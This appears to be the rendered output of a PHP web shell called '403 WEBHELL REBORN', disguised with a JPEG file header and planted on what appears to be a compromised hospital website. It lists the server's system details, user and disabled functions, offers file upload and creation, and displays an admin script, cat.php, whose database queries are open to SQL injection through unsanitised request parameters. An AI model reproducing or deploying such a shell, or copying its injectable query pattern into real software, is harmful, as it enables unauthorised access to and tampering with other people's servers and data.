ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/private_html//////adminvn/cat.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true && check_level() >= 4) {

    $q_cat_type = @mysql_query("SELECT * FROM cily_cats WHERE id = ".$_POST['sub']."");    
    $lcat12 = @mysql_fetch_array ($q_cat_type);

    if ($_POST['sub'] <> 0) { 
        $chonkieu = $lcat12['cat_type'];
        $chonlang = $lcat12['cat_lang'];
        $_SESSION['cat_lang'] = $lcat12['cat_lang'];
    }else { 
        $chonkieu = $_POST['kieushow']; 
        $chonlang = $_POST['cat_lang'];
        $_SESSION['cat_lang'] = $_POST['cat_lang'];
    }  
    if($_GET['type'] == 'add' && strlen($_POST['name']) >= 1 && $_POST['order']){
        $_SESSION['cat_sub'] = $_POST['sub'];
        
        if ($_POST['order'] != '1'){$_SESSION['cat_order'] = $_POST['order'] + '1';} else {$_SESSION['cat_order'] = '2';}
        @mysql_query("INSERT INTO cily_cats (cat_name, cat_name_ascii, cat_value, cat_info, cat_img, cat_type, cat_order, cat_sub, cat_lang) VALUES ('".addsla($_POST['name'])."', '".ascii($_POST['name'])."', '".$_POST['thuoctinh']."', '".addsla($_POST['desc'])."', '".str_replace('thumbs-','',$_POST['img'])."', ".$chonkieu.", ".$_POST['order'].", ".$_POST['sub'].", ".$chonlang.")");
        Redirect("","http://".$_SESSION['link']);
    }
    
    elseif($_GET['type'] == 'edit'){

        if ($_POST['sub'] <> 0) { 
        $chonlang1 = $lcat12['cat_lang'];
        }else {$chonlang1 = $_POST['cat_lang'];} 

            @mysql_query("UPDATE cily_cats SET cat_name = '".addsla($_POST['name'])."', cat_name_ascii = '".ascii($_POST['name'])."', cat_value = '".($_POST['thuoctinh'])."', cat_info = '".addsla($_POST['desc'])."',  cat_img = '".str_replace('thumbs-','',$_POST['img'])."', cat_type = '".$_POST['kieushow']."', cat_order = ".$_POST['order'].", cat_sub = ".$_POST['sub'].", cat_lang = ".$chonlang1." WHERE id = ".$_POST['id']);
        Redirect("","http://".$_SESSION['link']);

    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){

        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            if ($_POST['id'][$i] != '1') {
                @mysql_query("DELETE FROM cily_cats WHERE id = ".$_POST['id'][$i]);  
            }else {
                Redirect("Thư mục Folder Root không được xóa","http://".$_SESSION['link']);
            }
        }
        Redirect("","http://".$_SESSION['link']);
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 2){
        $idm = $_POST["rowid"];
    $sttm = $_POST["idorder"];
    $lap=count($idm);
    for($i=0; $i<$lap; $i++) {
            @mysql_query("UPDATE cily_cats SET cat_order = ".$sttm[$i]." WHERE id = ".$idm[$i]);
    }
        Redirect("","http://".$_SESSION['link']);
    }
    
    elseif($_GET['type'] == 'state'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
    @mysql_query("UPDATE cily_cats SET cat_home = '".$getoc."' WHERE id = ".$getid);
         
        Redirect("","http://".$_SESSION['link']);
    }
    
    else Redirect("","http://".$_SESSION['link']);
}

elseif(check_log() == true && check_level() >= 3 && $_POST['type'] == 2) {
    if($_GET['type'] == 'add' && strlen($_POST['name']) >= 1 && $_POST['order']){
        $_SESSION['cat_sub'] = $_POST['sub'];
        @mysql_query("INSERT INTO cily_cats (cat_name, cat_name_ascii, cat_value, cat_info, cat_img, cat_type, cat_order, cat_sub, cat_lang) VALUES ('".addsla($_POST['name'])."', '".ascii($_POST['name'])."', '".($_POST['thuoctinh'])."', '".addsla($_POST['desc'])."', '".str_replace('thumbs-','',$_POST['img'])."', ".$_POST['type'].", ".$_POST['order'].", ".$_POST['sub'].", ".$_POST['cat_lang'].")");
        header('Location: index.php?m=3&sm=2');
    }
    
    elseif($_GET['type'] == 'edit'){
        @mysql_query("UPDATE cily_cats SET cat_name = '".addsla($_POST['name'])."', cat_value = '".addsla($_POST['thuoctinh'])."', cat_info = '".addsla($_POST['desc'])."', cat_img = '".str_replace('thumbs-','',$_POST['img'])."', cat_order = ".$_POST['order'].", cat_sub = ".$_POST['sub'].", cat_lang = ".$_POST['cat_lang']." WHERE id = ".$_POST['id']);
        header('Location: index.php?m=3&sm=2');
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            if ($_POST['id'][$i] != '1') {
                @mysql_query("DELETE FROM cily_cats WHERE id = ".$_POST['id'][$i]);  
            }else {
                Redirect("Thư mục Folder Root không được xóa","http://".$_SESSION['link']);
            }
        }
        header('Location: index.php?m=3&sm=2');
    }
    
    else header('Location: index.php?m=3&sm=2');
}

else echo "Hacking attempt";


?>

Anon7 - 2021